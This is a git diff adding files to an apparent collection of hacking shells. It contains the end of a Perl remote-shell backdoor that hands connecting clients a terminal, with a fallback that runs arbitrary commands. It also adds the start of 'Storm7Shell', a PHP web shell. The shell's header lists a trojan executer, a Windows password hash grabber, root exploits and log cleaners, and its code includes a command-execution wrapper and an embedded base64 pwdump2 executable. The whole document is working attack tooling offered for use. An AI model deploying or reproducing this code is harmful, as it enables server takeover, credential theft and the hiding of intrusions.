+     write_shell($cli, $msg);
+  }
+}
+
+sub read_shell {
+  my $shell = shift;
+  my $cli;
+  map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
+
+  my $msg;
+  my $nread = sysread($shell, $msg, 1024);
+ 
+  if ($nread == 0) {
+    finish_client($cli, "Terminal closed.\r\n\r");
+  } else {
+     write_client($cli, $msg);
+  }
+}
+
+sub to_chr {
+  my $chrs = '';
+  map { $chrs .= chr($_) }  (split(/ +/, shift));
+  return($chrs);
+}
+
+sub do_client {
+  my ($client, @codes) = @_;
+  map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
+}
+
+
+sub chr_parse { 
+  my ($client, $chrs) = @_;
+
+  my $ords = '';
+  map { $ords .= ord($_).' ' } (split(//, $chrs));
+  my $msg = '';
+
+
+  if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
+     my $winsize = pack('C4', $4, $3, $2, $1);
+     ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
+  }
+
+  foreach my $code (split("255 ", $ords)) {
+    if ($code =~ /(\d+) (.*)$/) {
+      my $codes = $2;
+      if ($1 == 251) {
+        # do whatever you want dude ehehe
+        $msg .= chr(255).chr(253);
+
+        map { $msg .= chr($_) } (split(/ +/, $codes));
+      }
+    }
+  }
+
+  write_client($client, $msg) if ($msg);
+  return(1);
+}
+
+sub new_shell {
+  my $cli = shift;
+
+  POSIX::setpgid(0, 0);
+
+  my ($tty, $pty);
+
+  unless (($tty, $pty) = open_tty($cli)) {
+    finish_client($cli, "ERROR: No more pty?s avaliable\n");
+    return(undef);
+  }
+
+  my $pid = fork();
+  if (not defined($pid)) {
+    finish_client($cli, "ERROR: fork()\n");
+    return(undef);
+  }
+
+  unless($pid) {
+    close($pty);
+
+    local(*DEVTTY);
+
+    if (open (DEVTTY, "/dev/tty")) {
+      ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
+      close(DEVTTY);
+    }
+
+    POSIX::setsid();
+    ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
+
+    open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
+    open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
+    open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
+    close($tty);
+
+    sleep(1);
+
+    foreach my $stty ("/bin/stty", "/usr/bin/stty") {
+      next unless (-x $stty);
+      map { system("$stty", $_) } @STTY;
+    }
+
+    chdir("$HOME");
+    { exec("$SHELL") };
+
+    syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
+    syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
+    syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
+
+    while (my $msg = <STDIN>) {
+      $msg =~ s/\n$//;
+      $msg =~ s/\r$//;
+
+      if ($msg =~ /^\s*cd\s+(\S+)/) {
+        my $notf = "directory $1 not found!\n";
+        chdir($1) || syswrite(STDOUT, $notf, length($notf));
+      } else {
+         system("$msg 2>&1");
+      }
+      syswrite(STDOUT, "I'm FuCKeD!# ");
+    }
+
+    exit;
+  }
+  close($tty);
+
+  select($pty); $| = 1;
+  select(STDOUT);
+
+  set_raw($pty);
+
+  $CLIENT{$cli}->{shell} = $pty;
+  $sel_shell->add($pty);
+
+  return(1);
+}
+
+
+
+# Funciton set_raw() stolen from IO::Pty
+sub set_raw($) {
+  my $self = shift;
+  return 1 if not POSIX::isatty($self);
+  my $ttyno = fileno($self);
+  my $termios = new POSIX::Termios;
+  unless ($termios) {
+#    warn "set_raw: new POSIX::Termios failed: $!";
+    return undef;
+  }
+  unless ($termios->getattr($ttyno)) {
+#    warn "set_raw: getattr($ttyno) failed: $!";
+    return undef;
+  }
+  $termios->setiflag(0);
+  $termios->setoflag(0);
+  $termios->setlflag(0);
+  $termios->setcc(&POSIX::VMIN, 1);
+  $termios->setcc(&POSIX::VTIME, 0);
+  unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
+#    warn "set_raw: setattr($ttyno) failed: $!";
+    return undef;
+  }
+  return 1;
+}
+
+sub open_tty {
+  no strict;
+  my $cli = shift;
+  my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
+
+  
+  for (my $i = 0; $i < 256; $i++) {
+     my $pty = get_tty($i, "/dev/pty");
+     next unless (open($PTY, "+> $pty"));
+
+     my $tty = get_tty($i, "/dev/tty");
+
+     unless(open($TTY, "+> $tty")) {
+       close($PTY);
+       next;
+     }
+
+     return($TTY, $PTY);
+
+  }
+
+  return();
+}
+
+sub get_tty {
+  my ($num, $base) = @_;
+
+  my @series = ('p' .. 'z', 'a' .. 'e');
+  my @subs = ('0' .. '9', 'a' .. 'f');
+
+  my $buf = $base;
+  $buf .= @series[($num >> 4) & 0xF];
+  $buf .= @subs[$num & 0xF];
+
+  return($buf);
+}
+
+sub safeload {
+  my ($module, $require, $arg) = @_;
+  my $file = $module;
+  $file =~ s/::/\//g;
+
+  if ($require) {
+    # all found gonna be loaded
+    map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
+  } else {
+      $file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
+      return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
+  }
+
+  return();
+}
+
+sub write_shell {
+  my ($cli, $msg) = @_;
+  my $shell = $CLIENT{$cli}->{shell};
+
+  return(undef) unless ($shell);
+
+  foreach my $m (split_chars($msg, 20)) {
+    read_shells();
+    print $shell $m;
+    read_shells();
+  }
+  return(1);
+}
+
+sub split_chars {
+  my ($msg, $nchars) = @_;
+
+  my @splited;
+  my @chrs = split ('', $msg);
+  my $done = 0;
+  while ( 1 ) {
+    my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
+    $done += $nchars;
+    last if (length($splited) < 1);
+    push(@splited, $splited);
+  }
+  return(@splited);
+}
+
+sub finish_client {
+  my ($cli, $msg) = @_;
+  write_client($cli, $msg);
+  close_client($cli);
+}
+   
+sub close_client {
+  my $cli = shift;
+  my $sock = $CLIENT{$cli}->{sock};
+
+  $sel_serv->remove($sock);
+  if ($CLIENT{$cli}->{shell}) {
+    my $shell = $CLIENT{$cli}->{shell};
+    $sel_shell->remove($shell);
+    close($shell);
+  }
+  $sock->close() if($sock);
+  delete($CLIENT{$cli});
+}
+
+sub write_client {
+   my ($cli, $msg) = @_;
+   my $sock = $CLIENT{$cli}->{sock};
+   syswrite($sock, $msg, length($msg)) if ($sock);
+}
+ 
diff --git a/xakep-shells/PHP/1.txt b/xakep-shells/PHP/1.txt
new file mode 100644
index 0000000..e91966e
--- /dev/null
+++ b/xakep-shells/PHP/1.txt
@@ -0,0 +1,8340 @@
+<?php
+
+/******************************************************************************************
+*  Storm7Shell, a modded Locus7Shell, which is a: $count=0; while($count==0){ echo ' mod of a'; }
+*
+*  VERSION 2 BITCH!!!!
+*
+*  By sToRm - the 15-year-old hacker :)
+*
+*  Greetz to all my friends in #lobby
+*
+*  A big, fat "fuck you" to:
+*   - HellBound Hackers (you're also part of the next on the list, except you can't even deface!)
+*   - people who deface because they can't root and think they're 1337
+*   - idiots who add mail() to their shells so they can log your ownages
+*   - idiots who add mail() to their shells so they can log your ownages and mess up the variables so it doesn't even work!
+*   - MPAA, RIAA, and all those other arse-hole anti-p2p organizations
+* 
+*  lack of money and parental freedom leaves me with no site to advertise xD
+*
+*
+*  Newer Mods (added by me) for v2 --
++--------------------------------------------------------+
+*  fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir
+*  fixed the *nix aliases where the cmds were in the name and the names were executed :S
+*  added md5/sha1 file checksums
+*  removed fgdump (no need for three programs that do the same f-ing thing :P) !!! 1 mb saved !!!
+*  
+*
+*  Old Mods (added by me) for v1 --
++--------------------------------------------------------+
+*  added the trojan executer
+*  cleaned up the interface in general
+*  added windows login hash grabber + sam/fg/pwdump2
+*  added mass code injector (thanks SubSyn)
+*  added pre-compiled h00lyshit and raptor_chown
+*  added log cleaners for both *nix and windows
+*  removed all the shitty/non-working functions in the drop-down boxes
+*  fixed the google kernel thing (the search variables were fuxxed up)
+*  made the dir listing easier to read with the alternating bgcolors
+*  little optimizations in code here and there (i'm an optimization whore tbh)
+*  submit md5/sha1 hash to cracking sites
+*  made that awesome logo ;)
+*  added the disabled php functions thing (took from r57shell)
+*  added better windows/*nix-specific aliases
+*  cleaned up the safe-mode bypass functions (wow, some of the shittiest code i've ever seen o_O )
+*  wordlist md5/sha1 cracker
+*
+*  What I Plan to Do Next --
++--------------------------------------------------------+
+*  smaller size (somehow) :S
+*  more sploits
+*  allow input for dir to unpack exploits to
+*  better trojans/backdoors
+*  more functions/aliases
+*  maybe move stuff around/change theme
+*  make the php picture in the dir listing white for easier readability
+*  take a first look at the sql section o.O
+*  remove:
+*   - more of those stupid spaces after every line
+*   - more " and change them to ' for faster execution
+*   - a bunch of other stupid code things (example:  echo("$msg");  (wtf... :S))
+*********************************************************/
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi('Linux',$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+
+//w4ck1ng Shell
+if (!function_exists('myshellexec'))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = '';
+ if (!empty($cmd))
+ {
+  if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = '';
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+$pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lWbkOqRW4fiVZuGolX
+biGJVm7lqVxuG4lWbvKWXG4qiVZuUmljaBqJVm4AAAAAAAAAAFBFAABMAQMA7bzbOAAAAAAAAAAA
+4AAPAQsBBgAAUAAAAEAAAAAAAABHHAAAABAAAABgAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAA
+AAAAAKAAAAAQAAAAAAAAAwAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAyGQAADwA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+LnRleHQAAAAESAAAABAAAABQAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAEAoAAABgAAAA
+EAAAAGAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAABghAAAAcAAAABAAAABwAAAAAAAAAAAAAAAA
+AABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPsDFNVVlcz
+7Wh4cEAAiWwkFP8VEGBAAIvYO911Cl9eXTPAW4PEDMOLNVRgQABoXHBAAFP/1jvFo4R9QAB1Cl9e
+XTPAW4PEDMNoRHBAAFP/1jvFo4h9QAB1Cl9eXTPAW4PEDMO/0AcAAFdV6H8GAACL8IPECDv1dCyN
+RCQQUFdWagX/FYR9QAA9BAAAwHUggcfQBwAAV1boUwYAAIvwg8QIhfZ11F9eXTPAW4PEDMOL/mbH
+RCQUEgBmx0QkFhQAx0QkGDBwQACLRzyFwHQVjU84agGNVCQYUVL/FYh9QACFwHQRiwczyYXAD5TB
+A/iFyXTV6w6LTCQgi0dEvQEAAACJAVbouAUAAIPEBFP/FXRgQABfi8VeXVuDxAzDkJCQkItEJARQ
+aIBwQADo4gcAAIPECGoB6AMHAACQkJCQkJCQUYtEJAhTVoP4AlfHRCQMAAAAAHUci3QkGItGBFDo
+VgkAAIPEBIlEJAyFwHU9iw7rMIP4AXUljVQkDFLogP7//4PEBIXAdSNohHFAAOiABwAAg8QEagHo
+oQYAAItEJBiLCFHoef///4PEBOjxAAAAhcB0EmhMcUAAaKBzQADogAcAAIPECItUJAxSagBo/w8f
+AP8VHGBAAIvYhdt1IP8VGGBAAFBoJHFAAGigc0AA6E8HAACDxAxqAeg/BgAAagBqAGoAagD/FRRg
+QACL8I1EJBhQagBWaJAVQABqAGoA/xU0YEAAi/iF/3Ug/xUYYEAAUGjwcEAAaKBzQADoAgcAAIPE
+DGoB6PIFAABoECcAAFaLNTBgQAD/1oXAdCD/FRhgQABQaMBwQABooHNAAOjQBgAAg8QMagHowAUA
+AFPo3gAAAIPEBGr/V//WX14zwFtZw5CQkJCQkJCQkJCQkJCQkIPsFI1EJABWUGogx0QkDAAAAAAz
+9v8VJGBAAFD/FQBgQACFwHUQ/xUYYEAAi/BWaDhyQADrYI1MJAxRaCRyQABqAP8VBGBAAIXAdRD/
+FRhgQACL8FZoBHJAAOs6i0QkBGoAagCNVCQQagBSagBQx0QkLAIAAADHRCQgAQAAAP8VCGBAAIXA
+dRv/FRhgQACL8FZo3HFAAGigc0AA6AIGAACDxAyLRCQEhcB0B1D/FSBgQACLxl6DxBTDkJCQkJCQ
+kIHsKAQAAFNWV2gMc0AA/xUQYEAAiz1UYEAAi/Bo/HJAAFb/12jsckAAVomEJCABAAD/12jgckAA
+VomEJCQBAAD/14mEJCABAACNRCQUaAQBAABQagD/FTxgQACNTCQUalxR6FkIAACLFdRyQABAaAUB
+AACJEIsN2HJAAIlIBIsV3HJAAI2MJDABAACJUAiNRCQgUFHoJwcAAGgFAQAAjZQkQQIAAGjMckAA
+UugQBwAAg8Qg/xU4YEAAUGi4ckAAjYQkNgMAAGgFAQAAUOiSBgAAi5wkSAQAAL6AFUAAg8QQge5A
+FUAAagSNjiADAABoABAAAFFqAFP/FVhgQACL+IX/dSP/FRhgQABQaJxyQABooHNAAOjJBAAAg8QM
+X15bgcQoBAAAw41UJAxVUo2EJCABAABoHAMAAFBXU/8VXGBAAIXAdB2NTCQQja8gAwAAUVZoQBVA
+AFVT/xVcYEAAhcB1G/8VGGBAAFBofHJAAGigc0AA6GoEAACDxAzrSY1UJBRSagBXVWoAagBT/xUs
+YEAAi/CF9nUb/xUYYEAAUGhcckAAaKBzQADoNQQAAIPEDOsJav9W/xUwYEAAhfZ0B1b/FSBgQABo
+AIAAAGoAV1P/FShgQABdX15bgcQoBAAAw1NWi3QkDFeDy/+NRgxQ/xaL+IX/dCGNjhEBAABRV/9W
+BIXAdA6NlhYCAABS/9CDxASL2Ff/Vghfi8NeW8OQkJDDkJCQkJCQkJCQkJCQkJCQgewMBQAAU1b/
+FThgQABQaLhyQACNRCQUaAQBAABQ6BAFAACDxBCNTCQMagBoECcAAGgABAAAaAAEAABqAWoAaAEA
+AIBR/xVQYEAAi/CF9nUi/xUYYEAAUGg8c0AAaKBzQADoSwMAAIPEDF5bgcQMBQAAw4uUJBgFAABS
+/xVMYEAAagBW/xVIYEAAix0YYEAAhcB1Lv/TPRcCAAB0Jf/TUGgcc0AAaKBzQADoAwMAAIPEDFb/
+FSBgQABeW4HEDAUAAMNViy1EYEAAVzP/jUQkEGoAUI2MJCABAABoAAQAAFFW/9WFwHQji1QkEI2E
+JBgBAABQaBhzQADGhBQgAQAAAOh8AgAAg8QI6wT/04v4g/9tdblW/xVAYEAAVv8VIGBAAF9dXluB
+xAwFAADDkJCQkFaLdCQIhfZ0JFboGgcAAFmFwFZ0ClDoOQcAAFlZXsNqAP813IBAAP8VZGBAAF7D
+U4tcJAhVVoXbV3UP/3QkGOhBFQAAWekAAQAAi3QkGIX2dQ5T6Kj///9ZM8Dp6gAAADP/g/7gD4fA
+AAAAU+i4BgAAi+hZhe0PhIwAAAA7Nex1QAB3RFZTVeioDgAAg8QMhcB0BIv76ylW6OIJAACL+FmF
+/3Qki0P8SDvGcgKLxlBTV+iaEQAAU1XolwYAAIPEFIX/D4WAAAAAhfZ1A2oBXoPGD4Pm8FZqAP81
+3IBAAP8VbGBAAIv4hf90QYtD/Eg7xnICi8ZQU1foVBEAAFNV6FEGAACDxBTrH4X2dQNqAV6Dxg+D
+5vBWU2oA/zXcgEAA/xVoYEAAi/iF/3Udgz0wfEAAAHQUVujwEAAAhcBZD4Ud////6RH///+Lx19e
+XVvDoRSRQACFwHQC/9BoFHBAAGgIcEAA6M4AAABoBHBAAGgAcEAA6L8AAACDxBDDagBqAP90JAzo
+FQAAAIPEDMNqAGoB/3QkDOgEAAAAg8QMw1dqAV85PRh8QAB1Ef90JAj/FSRgQABQ/xVgYEAAg3wk
+DABTi1wkFIk9FHxAAIgdEHxAAHU8oRCRQACFwHQiiw0MkUAAVo1x/DvwchOLBoXAdAL/0IPuBDs1
+EJFAAHPtXmggcEAAaBhwQADoKgAAAFlZaChwQABoJHBAAOgZAAAAWVmF21t1EP90JAiJPRh8QAD/
+FXBgQABfw1aLdCQIO3QkDHMNiwaFwHQC/9CDxgTr7V7DU1a+gHNAAFdW6JoTAACL+I1EJBhQ/3Qk
+GFboUxQAAFZXi9joDRQAAIPEGIvDX15bw1WL7FZX/3UI6GoTAACL8I1FEFD/dQz/dQjoIxQAAP91
+CIv4VujbEwAAg8QYi8dfXl3DoQCRQABWahSFwF51B7gAAgAA6wY7xn0Hi8ajAJFAAGoEUOidHQAA
+WaPkgEAAhcBZdSFqBFaJNQCRQADohB0AAFmj5IBAAIXAWXUIahroYAMAAFkzybhgc0AAixXkgEAA
+iQQRg8Agg8EEPeB1QAB86jPSuXBzQACLwovywfgFg+YfiwSFwH9AAIsE8IP4/3QEhcB1A4MJ/4PB
+IEKB+dBzQAB81F7D6IYeAACAPRB8QAAAdAXpiR0AAMNTVVZXi3wkFIM9DHhAAAF+Dw+2B2oIUOjR
+HgAAWVnrDw+2B4sNAHZAAIoEQYPgCIXAdANH69IPtjdHg/4ti+50BYP+K3UED7Y3RzPbgz0MeEAA
+AX4MagRW6JAeAABZWesLoQB2QACKBHCD4ASFwHQNjQSbjVxG0A+2N0frz4P9LYvDdQL32F9eXVvD
+/3QkBOhs////WcNVi+yD7CCLRQhWiUXoiUXgi0UMx0XsQgAAAIlF5I1FFFCNReD/dRBQ6JMSAACD
+xAz/TeSL8HgIi0XggCAA6w2NReBQagDotx4AAFlZi8ZeycPMzMzMzMzMzMzMzMyLTCQMV4XJdHpW
+U4vZi3QkFPfGAwAAAIt8JBB1B8HpAnVv6yGKBkaIB0dJdCWEwHQp98YDAAAAdeuL2cHpAnVRg+MD
+dA2KBkaIB0eEwHQvS3Xzi0QkEFteX8P3xwMAAAB0EogHR0kPhIoAAAD3xwMAAAB17ovZwekCdWyI
+B0dLdfpbXotEJAhfw4kXg8cESXSvuv/+/n6LBgPQg/D/M8KLFoPGBKkAAQGBdN6E0nQshPZ0HvfC
